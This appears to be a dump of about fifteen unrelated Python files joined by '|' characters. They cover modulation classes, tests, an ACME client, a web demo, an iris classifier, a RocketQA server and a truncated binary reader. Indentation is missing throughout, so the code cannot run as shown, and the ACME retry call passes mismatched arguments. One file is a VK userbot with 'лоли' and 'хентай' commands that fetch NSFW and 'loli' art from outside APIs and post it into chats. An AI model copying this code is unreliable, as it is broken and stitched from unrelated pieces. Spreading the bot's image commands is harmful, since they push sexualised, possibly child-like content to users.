bin_out = [np.binary_repr(d, width=self.N)
for d in decs]
return bin_out
def bin2de(self, bin_in):
""" Converts values from binary to decimal representation.
Parameters
----------
bin_in : list of ints
Input binary values.
Returns
-------
dec_out : list of ints
Output decimal values.
"""
dec_out = []
N = self.N # bits per modulation symbol (local variables are tiny bit faster)
Ndecs = int(len(bin_in) / N) # length of the decimal output
for i in range(Ndecs):
bin_seq = bin_in[i * N:i * N + N] # binary equivalent of the one decimal value
str_o = "".join([str(int(b)) for b in bin_seq]) # binary sequence to string
if N % 2 == 0:
str_o = str_o[::-1]
dec_out.append(int(str_o, 2))
return dec_out
def plot_const(self):
""" Plots signal constellation """
const = self.code_book
fig = plt.figure(figsize=(6, 4), dpi=150)
for i in list(const):
x = np.real(const[i])
y = np.imag(const[i])
plt.plot(x, y, 'o', color='green')
if x < 0:
h = 'right'
xadd = -.03
else:
h = 'left'
xadd = .03
if y < 0:
v = 'top'
yadd = -.03
else:
v = 'bottom'
yadd = .03
if abs(x) < 1e-9 and abs(y) > 1e-9:
h = 'center'
elif abs(x) > 1e-9 and abs(y) < 1e-9:
v = 'center'
plt.annotate(i, (x + xadd, y + yadd), ha=h, va=v)
if self.M == 2:
M = 'B'
elif self.M == 4:
M = 'Q'
else:
M = str(self.M) + "-"
if self.gray_map:
mapping = 'Gray'
else:
mapping = 'Binary'
if self.bin_input:
inputs = 'Binary'
else:
inputs = 'Decimal'
plt.grid()
plt.axvline(linewidth=1.0, color='black')
plt.axhline(linewidth=1.0, color='black')
plt.axis([-1.5, 1.5, -1.5, 1.5])
plt.title(M + 'PSK, phase rotation: ' + str(round(self.phi, 5)) + \
', Mapping: ' + mapping + ', Input: ' + inputs)
plt.show()
class QAMModem(Modem):
def __init__(self, M, gray_map=True, bin_input=True, soft_decision=True, bin_output=True):
super().__init__(M, gray_map, bin_input, soft_decision, bin_output)
if np.sqrt(M) != np.fix(np.sqrt(M)) or np.log2(np.sqrt(M)) != np.fix(np.log2(np.sqrt(M))):
raise ValueError('M must be a square of a power of 2')
self.m = [i for i in range(self.M)]
self.s = self.__qam_symbols()
self.code_book = self.create_constellation(self.m, self.s)
if self.gray_map:
self.__gray_qam_arange()
self.zeros, self.ones = self.llr_preparation()
def __qam_symbols(self):
""" Creates M-QAM complex symbols."""
c = np.sqrt(self.M)
b = -2 * (np.array(self.m) % c) + c - 1
a = 2 * np.floor(np.array(self.m) / c) - c + 1
s = list((a + 1j * b))
return s
def __gray_qam_arange(self):
""" This method re-arranges complex coordinates according to Gray coding requirements.
To implement correct Gray mapping the additional heuristic is used:
the even "columns" in the signal constellation is complex conjugated.
"""
for idx, (key, item) in enumerate(self.code_book.items()):
if (np.floor(idx / np.sqrt(self.M)) % 2) != 0:
self.code_book[key] = np.conj(item)
def de2bin(self, decs):
""" Converts values from decimal to binary representation.
Parameters
----------
decs : list of ints
Input decimal values.
Returns
-------
bin_out : list of ints
Output binary sequences.
"""
bin_out = [np.binary_repr(d, width=self.N) for d in decs]
return bin_out
def bin2de(self, bin_in):
""" Converts values from binary to decimal representation.
Parameters
----------
bin_in : list of ints
Input binary values.
Returns
-------
dec_out : list of ints
Output decimal values.
"""
dec_out = []
N = self.N # bits per modulation symbol (local variables are tiny bit faster)
Ndecs = int(len(bin_in) / N) # length of the decimal output
for i in range(Ndecs):
bin_seq = bin_in[i * N:i * N + N] # binary equivalent of the one decimal value
str_o = "".join([str(int(b)) for b in bin_seq]) # binary sequence to string
dec_out.append(int(str_o, 2))
return dec_out
def plot_const(self):
""" Plots signal constellation """
if self.M <= 16:
limits = np.log2(self.M)
size = 'small'
elif self.M == 64:
limits = 1.5 * np.log2(self.M)
size = 'x-small'
else:
limits = 2.25 * np.log2(self.M)
size = 'xx-small'
const = self.code_book
fig = plt.figure(figsize=(6, 4), dpi=150)
for i in list(const):
x = np.real(const[i])
y = np.imag(const[i])
plt.plot(x, y, 'o', color='red')
if x < 0:
h = 'right'
xadd = -.05
else:
h = 'left'
xadd = .05
if y < 0:
v = 'top'
yadd = -.05
else:
v = 'bottom'
yadd = .05
if abs(x) < 1e-9 and abs(y) > 1e-9:
h = 'center'
elif abs(x) > 1e-9 and abs(y) < 1e-9:
v = 'center'
plt.annotate(i, (x + xadd, y + yadd), ha=h, va=v, size=size)
M = str(self.M)
if self.gray_map:
mapping = 'Gray'
else:
mapping = 'Binary'
if self.bin_input:
inputs = 'Binary'
else:
inputs = 'Decimal'
plt.grid()
plt.axvline(linewidth=1.0, color='black')
plt.axhline(linewidth=1.0, color='black')
plt.axis([-limits, limits, -limits, limits])
plt.title(M + '-QAM, Mapping: ' + mapping + ', Input: ' + inputs)
plt.show()
|
from io import BytesIO
import requests
from duty.objects import dp, MySignalEvent
# Прошу прощения за говнокод. Лень было функцию для загрузки делать :)
@dp.longpoll_event_register('неко')
@dp.my_signal_event_register('неко')
def neko(event: MySignalEvent) -> str:
event.msg_op(2, "⏱️Секунду...")
img_url = requests.get("https://api.loli-art.ru/arts?count=1").json()["arts"][0]
image = BytesIO(requests.get(url=img_url).content)
image.name = 'neko.jpg'
upload_url = event.api('photos.getMessagesUploadServer')['upload_url']
data = requests.post(upload_url, files={'photo': image}).json()
del (image)
saved = event.api('photos.saveMessagesPhoto', photo=data['photo'],
hash=data['hash'], server=data['server'])[0]
event.msg_op(2, "Держи свою Неко :)", attachment=f"photo{saved['owner_id']}_{saved['id']}_{saved['access_key']}")
@dp.longpoll_event_register('лоли')
@dp.my_signal_event_register('лоли')
def loli(event: MySignalEvent) -> str:
event.msg_op(2, "⏱️Секунду...")
img_url = requests.get("https://api.loli-art.ru/arts?count=1").json()["arts"][0]
image = BytesIO(requests.get(url=img_url).content)
image.name = 'neko.jpg'
upload_url = event.api('photos.getMessagesUploadServer')['upload_url']
data = requests.post(upload_url, files={'photo': image}).json()
del (image)
saved = event.api('photos.saveMessagesPhoto', photo=data['photo'],
hash=data['hash'], server=data['server'])[0]
event.msg_op(2, "Держи свою Лоли :)", attachment=f"photo{saved['owner_id']}_{saved['id']}_{saved['access_key']}")
@dp.longpoll_event_register('хентай')
@dp.my_signal_event_register('хентай')
def neko_hentai(event: MySignalEvent) -> str:
event.msg_op(2, "⏱️Секунду...")
img_urls = requests.get("https://api.waifu.pics/nsfw/neko").json()['url']
image = BytesIO(requests.get(url=img_urls).content)
image.name = 'neko.jpg'
upload_url = event.api('photos.getMessagesUploadServer')['upload_url']
data = requests.post(upload_url, files={'photo': image}).json()
del (image)
saved = event.api('photos.saveMessagesPhoto', photo=data['photo'],
hash=data['hash'], server=data['server'])[0]
event.msg_op(2, "Держи свой хентай :)", attachment=f"photo{saved['owner_id']}_{saved['id']}_{saved['access_key']}")
|
"""Test oscillator response calculation."""
import numpy as np
import pytest
import pyrotd
from .test_spectra import load_at2
osc_freq = 10
def calc_oscillator_resp(motion, osc_damping, resp):
return pyrotd.calc_oscillator_resp(
motion["freqs"],
motion["fourier_amps"],
osc_damping,
osc_freq,
peak_resp_only=True,
osc_type=resp,
)
@pytest.fixture
def motion():
time_step, accels = load_at2("RSN8883_14383980_13849090.AT2")
fourier_amps = np.fft.rfft(accels)
freqs = np.linspace(0, 1.0 / (2 * time_step), num=fourier_amps.size)
return {
"time_step": time_step,
"accels": accels,
"freqs": freqs,
"fourier_amps": fourier_amps,
}
@pytest.mark.parametrize(
"resp,power",
[
("sa", 0),
("psv", 1),
("sv", 1),
("sd", 2),
],
)
def test_osc_resp(motion, resp, power):
# For very light damping everything should be the same
osc_damping = 0.005
ref_psa = calc_oscillator_resp(motion, osc_damping, "psa")
calc_resp = pyrotd.calc_oscillator_resp(
motion["freqs"],
motion["fourier_amps"],
osc_damping,
osc_freq,
peak_resp_only=True,
osc_type=resp,
)
# Convert to PSA
calc_psa = calc_resp * (2 * np.pi * osc_freq) ** power
np.testing.assert_allclose(calc_psa, ref_psa, rtol=1e-1)
@pytest.mark.xfail(strict=True)
def test_sa(motion):
osc_damping = 0.010
ref_psa = calc_oscillator_resp(motion, osc_damping, "psa")
calc_psa = pyrotd.calc_oscillator_resp(
motion["freqs"],
motion["fourier_amps"],
osc_damping,
osc_freq,
peak_resp_only=True,
osc_type="sa",
)
np.testing.assert_allclose(calc_psa, ref_psa, rtol=1e-2)
|
import base64, subprocess, json
from urllib.request import urlopen, Request
def _base64(text):
"""Encodes string as base64 as specified in the ACME RFC."""
return base64.urlsafe_b64encode(text).decode("utf8").rstrip("=")
def _openssl(command, options, communicate=None):
"""Run openssl command line and raise IOError on non-zero return."""
openssl = subprocess.Popen(["openssl", command] + options,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = openssl.communicate(communicate)
if openssl.returncode != 0:
raise IOError("OpenSSL Error: {0}".format(err))
return out
def _cmd(cmd_list, stdin=None, cmd_input=None, err_msg="Command Line Error"):
"""helper function - run external commands"""
proc = subprocess.Popen(cmd_list, stdin=stdin, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = proc.communicate(cmd_input)
if proc.returncode != 0:
raise IOError("{0}\n{1}".format(err_msg, err))
return out
def _do_request(url, data=None, err_msg="Error", depth=0):
"""helper function - make request and automatically parse json response"""
try:
resp = urlopen(Request(url, data=data, headers={"Content-Type": "application/jose+json", "User-Agent": "acme-tiny"}))
resp_data, code, headers = resp.read().decode("utf8"), resp.getcode(), resp.headers
except IOError as e:
resp_data = e.read().decode("utf8") if hasattr(e, "read") else str(e)
code, headers = getattr(e, "code", None), {}
try:
resp_data = json.loads(resp_data) # try to parse json results
except ValueError:
pass # ignore json parsing errors
if depth < 100 and code == 400 and resp_data['type'] == "urn:ietf:params:acme:error:badNonce":
raise IndexError(resp_data) # allow 100 retrys for bad nonces
if code not in [200, 201, 204]:
raise ValueError("{0}:\nUrl: {1}\nData: {2}\nResponse Code: {3}\nResponse: {4}".format(err_msg, url, data, code, resp_data))
return resp_data, code, headers
def _send_signed_request(url, payload, directory, alg, acct_headers, account_key, jwk, err_msg, depth=0):
payload64 = "" if payload is None else _base64(json.dumps(payload).encode('utf8'))
new_nonce = _do_request(directory['newNonce'])[2]['Replay-Nonce']
protected = {"url": url, "alg": alg, "nonce": new_nonce}
protected.update({"jwk": jwk} if acct_headers is None else {"kid": acct_headers['Location']})
protected64 = _base64(json.dumps(protected).encode('utf8'))
protected_input = "{0}.{1}".format(protected64, payload64).encode('utf8')
out = _cmd(["openssl", "dgst", "-sha256", "-sign", account_key], stdin=subprocess.PIPE, cmd_input=protected_input, err_msg="OpenSSL Error")
data = json.dumps({"protected": protected64, "payload": payload64, "signature": _base64(out)})
try:
return _do_request(url, data=data.encode('utf8'), err_msg=err_msg, depth=depth)
except IndexError: # retry bad nonces (they raise IndexError)
return _send_signed_request(url, payload, err_msg, depth=(depth + 1))
|
import pytest
from ebl.dictionary.domain.word import WordId
from ebl.transliteration.domain import atf
from ebl.transliteration.domain.dollar_line import RulingDollarLine
from ebl.transliteration.domain.enclosure_tokens import BrokenAway
from ebl.transliteration.domain.language import Language
from ebl.transliteration.domain.line import ControlLine, EmptyLine
from ebl.transliteration.domain.line_number import LineNumber
from ebl.transliteration.domain.markup import EmphasisPart, LanguagePart, StringPart
from ebl.transliteration.domain.note_line import NoteLine
from ebl.transliteration.domain.sign_tokens import Reading
from ebl.transliteration.domain.text import Text
from ebl.transliteration.domain.text_line import TextLine
from ebl.transliteration.domain.tokens import Joiner, ValueToken, Variant
from ebl.transliteration.domain.word_tokens import Word
@pytest.mark.parametrize(
"old,new,expected",
[
(
Text.of_iterable(
[
TextLine.of_iterable(
LineNumber(1),
[
Word.of(
[
Reading.of_name("ha"),
Joiner.hyphen(),
Reading.of_name("am"),
]
)
],
),
ControlLine("#", " comment"),
]
),
Text.of_iterable(
[
TextLine.of_iterable(
LineNumber(1),
[
Word.of(
[
Reading.of_name("ha"),
Joiner.hyphen(),
Reading.of_name("am"),
]
)
],
),
ControlLine("#", " comment"),
]
),
Text.of_iterable(
[
TextLine.of_iterable(
LineNumber(1),
[
Word.of(
[
Reading.of_name("ha"),
Joiner.hyphen(),
Reading.of_name("am"),
]
)
],
),
ControlLine("#", " comment"),
]
),
),
(
Text.of_iterable([EmptyLine()]),
Text.of_iterable([RulingDollarLine(atf.Ruling.SINGLE)]),
Text.of_iterable([RulingDollarLine(atf.Ruling.SINGLE)]),
),
(
Text.of_iterable(
[
RulingDollarLine(atf.Ruling.DOUBLE),
RulingDollarLine(atf.Ruling.SINGLE),
EmptyLine(),
]
),
Text.of_iterable([RulingDollarLine(atf.Ruling.DOUBLE), EmptyLine()]),
Text.of_iterable([RulingDollarLine(atf.Ruling.DOUBLE), EmptyLine()]),
),
(
Text.of_iterable([EmptyLine(), RulingDollarLine(atf.Ruling.DOUBLE)]),
Text.of_iterable(
[
EmptyLine(),
RulingDollarLine(atf.Ruling.SINGLE),
RulingDollarLine(atf.Ruling.DOUBLE),
]
),
Text.of_iterable(
[
EmptyLine(),
RulingDollarLine(atf.Ruling.SINGLE),
RulingDollarLine(atf.Ruling.DOUBLE),
]
),
),
(
Text.of_iterable(
[
TextLine.of_iterable(
LineNumber(1),
[
Word.of(
[Reading.of_name("nu")], unique_lemma=(WordId("nu I"),)
),
Word.of(
[Reading.of_name("nu")], unique_lemma=(WordId("nu I"),)
),
],
)
]
),
Text.of_iterable(
[
TextLine.of_iterable(
LineNumber(1),
[
Word.of([Reading.of_name("mu")]),
Word.of([Reading.of_name("nu")]),
],
)
]
),
Text.of_iterable(
[
TextLine.of_iterable(
LineNumber(1),
[
Word.of([Reading.of_name("mu")]),
Word.of(
[Reading.of_name("nu")], unique_lemma=(WordId("nu I"),)
),
],
)
]
),
),
(
Text.of_iterable([ControlLine("$", " double ruling")]),
Text.of_iterable([RulingDollarLine(atf.Ruling.DOUBLE)]),
Text.of_iterable([RulingDollarLine(atf.Ruling.DOUBLE)]),
),
(
Text.of_iterable(
[
TextLine.of_iterable(
LineNumber(1),
[
Word.of(
[
Variant.of(
Reading.of([ValueToken.of("k[ur")]),
Reading.of([ValueToken.of("r[a")]),
)
]
),
BrokenAway.close(),
],
)
]
),
Text.of_iterable(
[
TextLine.of_iterable(
LineNumber(1),
[
Word.of(
[
Variant.of(
Reading.of(
[
ValueToken.of("k"),
BrokenAway.open(),
ValueToken.of("ur"),
]
),
Reading.of(
[
ValueToken.of("r"),
BrokenAway.open(),
ValueToken.of("a"),
]
),
)
]
),
BrokenAway.close(),
],
)
]
),
Text.of_iterable(
[
TextLine.of_iterable(
LineNumber(1),
[
Word.of(
[
Variant.of(
Reading.of(
[
ValueToken.of("k"),
BrokenAway.open(),
ValueToken.of("ur"),
]
),
Reading.of(
[
ValueToken.of("r"),
BrokenAway.open(),
ValueToken.of("a"),
]
),
)
]
),
BrokenAway.close(),
],
)
]
),
),
(
Text.of_iterable(
[
TextLine.of_iterable(
LineNumber(1), [Word.of([Reading.of_name("bu")])]
)
]
),
Text.of_iterable(
[
TextLine.of_iterable(
LineNumber(1), [Word.of([Reading.of_name("bu")])]
)
]
),
Text.of_iterable(
[
TextLine.of_iterable(
LineNumber(1), [Word.of([Reading.of_name("bu")])]
)
]
),
),
(
Text.of_iterable([NoteLine((StringPart("this is a note "),))]),
Text.of_iterable([NoteLine((StringPart("this is another note "),))]),
Text.of_iterable([NoteLine((StringPart("this is another note "),))]),
),
(
Text.of_iterable([NoteLine((StringPart("this is a note "),))]),
Text.of_iterable([NoteLine((EmphasisPart("this is a note "),))]),
Text.of_iterable([NoteLine((EmphasisPart("this is a note "),))]),
),
(
Text.of_iterable(
[
NoteLine(
(
LanguagePart.of_transliteration(
Language.AKKADIAN, (ValueToken.of("bu"),)
),
)
)
]
),
Text.of_iterable(
[
NoteLine(
(
LanguagePart.of_transliteration(
Language.AKKADIAN, (Word.of([Reading.of_name("bu")]),)
),
)
)
]
),
Text.of_iterable(
[
NoteLine(
(
LanguagePart.of_transliteration(
Language.AKKADIAN, (Word.of([Reading.of_name("bu")]),)
),
)
)
]
),
),
],
)
def test_merge(old: Text, new: Text, expected: Text) -> None:
new_version = f"{old.parser_version}-test"
merged = old.merge(new.set_parser_version(new_version))
assert merged == expected.set_parser_version(new_version)
|
from ktech_python.api import API
from ktech_python.middleware import Middleware
app = API()
def custom_exception_handler(request, response, exception_cls):
response.text = str(exception_cls)
app.add_exception_handler(custom_exception_handler)
@app.route("/home")
def home(request, response):
response.text = "Hello from the HOME page"
@app.route("/about")
def about(request, response):
response.text = "Hello from the ABOUT page"
@app.route("/hello/{name}")
def greeting(request, response, name):
response.text = f"Hello, {name}!"
@app.route("/tell/{name}/{age:d}")
def tellage(request, response, name, age):
response.text = f"Hello, {name}! Your age is {age}."
@app.route("/sum/{num_1:d}/{num_2:d}")
def sum(request, response, num_1, num_2):
total = int(num_1) + int(num_2)
response.text = f"{num_1} + {num_2} = {total}"
@app.route("/books")
class BooksView:
def get(self, req, resp):
resp.text = "Books Page"
def post(self, req, resp):
resp.text = "Endpoint to create a book"
# Testing Django based routes
def handler(req, resp):
resp.text = "sample"
app.add_route("/sample", handler)
# Testing template route
@app.route("/template")
def template_handler(req, resp):
resp.html = app.template("index.html", context={"name": "Bumbo", "title": "Best Framework"})
@app.route("/json")
def json_handler(req, resp):
resp.json = {"name": "data", "type": "JSON"}
@app.route("/text")
def text_handler(req, resp):
resp.text = "This is a simple text"
# Exception handler
@app.route("/exception")
def exception_throwing_handler(request, response):
raise AssertionError("This handler should not be used.")
# Custom middleware
class SimpleCustomMiddleware(Middleware):
def process_request(self, req):
print("Processing request", req.url)
def process_response(self, req, res):
print("Processing response", req.url)
app.add_middleware(SimpleCustomMiddleware) |
/home/runner/.cache/pip/pool/80/e1/5d/d331d8971e24aeb2c49fdf367ac3ad9b3ddd8e21b40454838608e5bdc2 |
"""TTT4275 Project in Classification"""
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.pyplot import figure
from matplotlib import style
import matplotlib.animation as animation
from sklearn.metrics import ConfusionMatrixDisplay
style.use('seaborn-paper')
legends = ["Setosa", "Versicolour", "Virginica"]
attribute_names = ["sepal_length", "sepal_width", "petal_length", "petal_width"]
iris_data = [
pd.read_csv("./Iris_TTT4275/class_1", names = attribute_names),
pd.read_csv("./Iris_TTT4275/class_2", names = attribute_names),
pd.read_csv("./Iris_TTT4275/class_3", names = attribute_names)]
n_attributes = len(attribute_names)
n_classes = len(iris_data)
dropped_attributes = [] #Any listed attribute dropped.
n_dropped = len(dropped_attributes)
n_attributes -= n_dropped
split_at = 30
alpha = 0.005
iterations = 500
test_first = True
tolerated_err = 0.045
def plot_histogram(iris_data):
bins = np.linspace(0, 10, 100)
for count, value in enumerate(iris_data):
value["class"] = count
fig, axis = plt.subplots(n_attributes)
for i in range(n_attributes):
for j in range(n_classes):
legend = legends[j]
axis[i].hist(iris_data[j][attribute_names[i]].to_numpy(), bins=bins,histtype="barstacked", alpha=0.5, label="Class " + legend, edgecolor="k")
axis[i].legend(loc='upper right')
axis[i].set_title(attribute_names[i])
axis[i].set_ylabel("n")
axis[i].set_xlabel("mm")
axis[0].set_ylim([0, 15])
axis[1].set_ylim([0, 15])
plt.show()
plot_histogram(iris_data)
def drop_attributes(iris_data, dropped_attributes):
for i in range(len(iris_data)):
iris_data[i]["class"] = i
iris_data[i] = iris_data[i].drop(columns=dropped_attributes)
return(iris_data)
iris_data = drop_attributes(iris_data, dropped_attributes)
def split_data(iris_data, split_at, default):
if default:
train_x = np.concatenate([df.iloc[0:split_at, :-1].to_numpy() for df in iris_data])
train_y_labels = np.concatenate([df.iloc[0:split_at,-1].to_numpy() for df in iris_data])
train_y = np.zeros((train_y_labels.shape[0], n_classes))
for i, label in np.ndenumerate(train_y_labels):
train_y[i][round(label)] = 1
test_x = np.concatenate([df.iloc[split_at:, :-1].to_numpy() for df in iris_data])
test_y_labels = np.concatenate([df.iloc[split_at:,-1].to_numpy() for df in iris_data])
test_y = np.zeros((test_y_labels.shape[0],n_classes))
for i, label in np.ndenumerate(test_y_labels):
test_y[i][round(label)] = 1
else:
train_x = np.concatenate([df.iloc[split_at:,:-1].to_numpy() for df in iris_data])
train_y_labels = np.concatenate([df.iloc[split_at:,-1].to_numpy() for df in iris_data])
train_y = np.zeros((train_y_labels.shape[0], n_classes))
for i, label in np.ndenumerate(train_y_labels):
train_y[i][round(label)] = 1
test_x = np.concatenate([df.iloc[0:split_at, :-1].to_numpy() for df in iris_data])
test_y_labels = np.concatenate([df.iloc[0:split_at,-1].to_numpy() for df in iris_data])
test_y = np.zeros((test_y_labels.shape[0],n_classes))
for i, label in np.ndenumerate(test_y_labels):
test_y[i][round(label)] = 1
return train_x, train_y, test_x, test_y
train_x, train_y, test_x, test_y = split_data(iris_data, split_at, test_first)
W = np.zeros((n_classes, n_attributes))
w_0 = np.zeros((n_classes,))
def sigmoid(x):
return np.array(1 / (1 + np.exp(-x)))
def prediction(x, W, w_0):
prediction = np.array([sigmoid((np.matmul(W,x[i])+w_0)) for i in range(x.shape[0])])
return prediction
#Mean square error
def MSE(pred, y):
# (1/N)*sum(error^2)
return np.sum(np.matmul(np.transpose(pred-y),(pred-y))) / pred.shape[0]
def train_W_b(pred, y, x, W, w_0, alpha):
pred_error = pred - y
pred_z_error = np.multiply(pred,(1-pred))
squarebracket = np.multiply(pred_error, pred_z_error)
dW = np.zeros(W.shape)
# Gradient of MSE with respect to W
for i in range (x.shape[0]):
dW = np.add(dW, np.outer(squarebracket[i], x[i]))
dw_0 = np.sum(squarebracket, axis=0)
return ((W-alpha*dW), (w_0-alpha*dw_0))
figure = plt.figure()
axis = figure.add_subplot(1,1,1)
# Arrays for storing plot values
plot_iteration = []
train_errors = []
test_errors = []
error_rate = 1
def get_error_rate(x, y, W, w_0):
pred = prediction(x, W, w_0)
mistakes = 0
for i in range(pred.shape[0]):
if np.argmax(y[i]) != np.argmax(pred[i]):
mistakes += 1
return mistakes/pred.shape[0]
def gen():
global error_rate
i = 0
while (error_rate >= tolerated_err and i<iterations):
i += 1
yield i
def run(i):
global W
global w_0
global error_rate
error_rate = get_error_rate(train_x, train_y, W, w_0)
print(error_rate)
train_prediction = prediction(train_x, W, w_0)
test_prediction = prediction(test_x, W, w_0)
train_error = MSE(train_prediction, train_y)
test_error = MSE(test_prediction, test_y)
#print(test_error)
#print(train_error)
plot_iteration.append(float(i))
train_errors.append(train_error)
test_errors.append(test_error)
axis.clear()
axis.plot(plot_iteration, train_errors, "blue")
axis.plot(plot_iteration, test_errors, "red")
W, w_0 = train_W_b(train_prediction, train_y, train_x, W, w_0, alpha)
# Generate confusion matrix
def generate_confusion_matrix(x, y, W, w_0):
pred = prediction(x, W, w_0)
confusion_matrix = np.zeros((n_classes, n_classes))
for i in range(pred.shape[0]):
confusion_matrix[np.argmax(y[i])][np.argmax(pred[i])] += 1
return confusion_matrix
animate = animation.FuncAnimation(figure, run, interval=16, frames=gen, repeat = False)
print(W)
plt.show()
print("Error rate train")
print(get_error_rate(train_x, train_y, W, w_0))
print("Confusion matrix train")
confusion_matrix_train = generate_confusion_matrix(train_x,train_y, W, w_0)
print(confusion_matrix_train)
disp = ConfusionMatrixDisplay(confusion_matrix_train, display_labels=legends)
disp.plot()
print("Error rate test")
print(get_error_rate(test_x, test_y, W, w_0))
confusion_matrix_test = generate_confusion_matrix(test_x,test_y, W, w_0)
print("Confusion matrix test")
print(confusion_matrix_test)
disp2 = ConfusionMatrixDisplay(confusion_matrix_test, display_labels=legends)
disp2.plot()
plt.show() |
# -*- coding: utf-8 -*-
from django import template
from .datetime_filter import format_time
register = template.Library()
@register.filter(name='find_special_time_by_event')
def find_special_time_by_event(special_results, event):
for result in special_results:
if result.event == event:
return format_time(result.time)
return 0
@register.filter(name='calculate_percentage')
def calculate_percentage(result, special_results):
for special_result in special_results:
if result.event.pk == special_result.event.id:
personal_best = result.time.seconds + (result.time.microseconds / 1000000)
special_result_time = special_result.time.seconds + (special_result.time.microseconds / 1000000)
percentage = round(personal_best / special_result_time * 100, 1)
return str(percentage) + '%'
return ""
|
import glob, unittest
from inspect import getmembers, isclass
loader = unittest.TestLoader()
for modname in (n[:-3] for n in glob.glob('test_*.py')):
for suite in loader.loadTestsFromName(modname):
if suite.countTestCases():
cls = list(suite)[0].__class__
tests = loader.getTestCaseNames(cls)
if tests:
for n in tests:
print '%s.%s.%s' % (modname, cls.__name__, n)
else:
print '%s.%s' % (modname, cls.__name__)
|
from .measurement_parameters import Parameter
from .measurement_procedure import Procedure
from .publisher import Publisher
|
from typing import Union, Callable
from pydantic.types import constr
from .stateful_mechanism import StatefulMechanism
from ..utils.pydantic_base_model import CamelBaseModel
class Suppression(StatefulMechanism):
"""
The suppression mechanisms anonymizes input by replacing it with a fixed string of the same or custom length.
This mechanisms takes two, optional parameters: `suppression_char` and `custom_length`.
The `suppression_char` parameter defines the character to be used for suppression (default: 'X').
>>> mechanism = Suppression(suppression_char='Y')
>>> mechanism.anonymize('test')
'YYYY'
The `custom_length` parameter defines the length of the suppressed output.
If the `custom_length` parameter is not set, the length of the input is preserved.
That means that the input 'foobar' will result in an anonymized output 'XXXXXX'.
If the `custom_length` parameter is set to 3, the output will be 'XXX' independent of the input.
To support randomized lengths, this parameter is allowed to be a function that takes
the input length as a parameter.
>>> mechanism = Suppression(custom_length=3)
>>> mechanism.anonymize('foobar')
'XXX'
>>> mechanism = Suppression(custom_length=lambda x: x + 1)
>>> mechanism.anonymize('foobar')
'XXXXXXX'
"""
suppression_char: str = "X"
custom_length: Union[int, Callable[[int], int], None] = None
class Config:
@staticmethod
def schema_extra(schema):
# manually add the customLength property which is ignored by pydantic because it accepts callables
schema["properties"]["customLength"] = {"title": "CustomLength", "type": "integer"}
def __length(self, input_len):
"""
Determines the length of the suppressed output based on a potentially defined custom length
and the input length.
"""
if isinstance(self.custom_length, int) and self.custom_length >= 0:
return self.custom_length
elif callable(self.custom_length):
return self.custom_length(input_len)
else:
return input_len
def apply(self, input_value):
"""
Anonymizes the given input parameter by suppressing it.
"""
output_len = self.__length(len(input_value))
return self.suppression_char * output_len
class SuppressionParameters(CamelBaseModel):
mechanism: constr(regex="^suppression$") = "suppression"
config: Suppression
|
import os
import sys
import json
import faiss
import numpy as np
from tornado import web
from tornado import ioloop
import rocketqa
class FaissTool():
"""
Faiss index tools
"""
def __init__(self, text_filename, index_filename):
self.engine = faiss.read_index(index_filename)
self.id2text = []
for line in open(text_filename):
self.id2text.append(line.strip())
def search(self, q_embs, topk=5):
res_dist, res_pid = self.engine.search(q_embs, topk)
result_list = []
for i in range(topk):
result_list.append(self.id2text[res_pid[0][i]])
return result_list
class RocketQAServer(web.RequestHandler):
def __init__(self, application, request, **kwargs):
web.RequestHandler.__init__(self, application, request)
self._faiss_tool = kwargs["faiss_tool"]
self._dual_encoder = kwargs["dual_encoder"]
self._cross_encoder = kwargs["cross_encoder"]
def get(self):
"""
Get request
"""
def post(self):
input_request = self.request.body
output = {}
output['error_code'] = 0
output['error_message'] = ''
output['answer'] = []
if input_request is None:
output['error_code'] = 1
output['error_message'] = "Input is empty"
self.write(json.dumps(output))
return
try:
input_data = json.loads(input_request)
except:
output['error_code'] = 2
output['error_message'] = "Load input request error"
self.write(json.dumps(output))
return
if "query" not in input_data:
output['error_code'] = 3
output['error_message'] = "[Query] is missing"
self.write(json.dumps(output))
return
query = input_data['query']
topk = 5
if "topk" in input_data:
topk = input_data['topk']
# encode query
q_embs = self._dual_encoder.encode_query(query=[query])
q_embs = np.array(list(q_embs))
# search with faiss
search_result = self._faiss_tool.search(q_embs, topk)
titles = []
paras = []
queries = []
for t_p in search_result:
queries.append(query)
t, p = t_p.split('\t')
titles.append(t)
paras.append(p)
ranking_score = self._cross_encoder.matching(query=queries, para=paras, title=titles)
ranking_score = list(ranking_score)
final_result = {}
for i in range(len(paras)):
final_result[query + '\t' + titles[i] + '\t' + paras[i]] = ranking_score[i]
sort_res = sorted(final_result.items(), key=lambda a:a[1], reverse=True)
for qtp, score in sort_res:
one_answer = {}
one_answer['probability'] = score
q, t, p = qtp.split('\t')
one_answer['title'] = t
one_answer['para'] = p
output['answer'].append(one_answer)
result_str = json.dumps(output, ensure_ascii=False)
self.write(result_str)
def create_rocketqa_app(sub_address, rocketqa_server, language, data_file, index_file):
"""
Create RocketQA server application
"""
if language == 'zh':
de_model = 'zh_dureader_de_v2'
ce_model = 'zh_dureader_ce_v2'
else:
de_model = 'v1_marco_de'
ce_model = 'v1_marco_ce'
de_conf = {
"model": de_model,
"use_cuda": True,
"device_id": 0,
"batch_size": 32
}
ce_conf = {
"model": ce_model,
"use_cuda": True,
"device_id": 0,
"batch_size": 32
}
dual_encoder = rocketqa.load_model(**de_conf)
cross_encoder = rocketqa.load_model(**ce_conf)
faiss_tool = FaissTool(data_file, index_file)
print ('Load index done')
return web.Application([(sub_address, rocketqa_server, \
dict(faiss_tool=faiss_tool, \
dual_encoder=dual_encoder, \
cross_encoder=cross_encoder))])
if __name__ == "__main__":
if len(sys.argv) != 4:
print ("USAGE: ")
print (" python3 rocketqa_service.py ${language} ${data_file} ${index_file}")
print ("--For Example:")
print (" python3 rocketqa_service.py zh ../data/dureader.para test.index")
exit()
language = sys.argv[1]
if language != 'en' and language != 'zh':
print ("illegal language, only [zh] and [en] is supported", file=sys.stderr)
exit()
data_file = sys.argv[2]
index_file = sys.argv[3]
sub_address = r'/rocketqa'
port = '8888'
app = create_rocketqa_app(sub_address, RocketQAServer, language, data_file, index_file)
app.listen(port)
ioloop.IOLoop.current().start()
|
import struct
import csv
import os
import numpy as np
import math
class BinaryReaderEOFException(Exception):
def __init__(self):
pass
def __str__(self):
return 'Not enough bytes in file to satisfy read request'
class BinaryReader(object):
def __init__(self, filename):
self.file = open(filename, 'rb')
self.typeNames = {
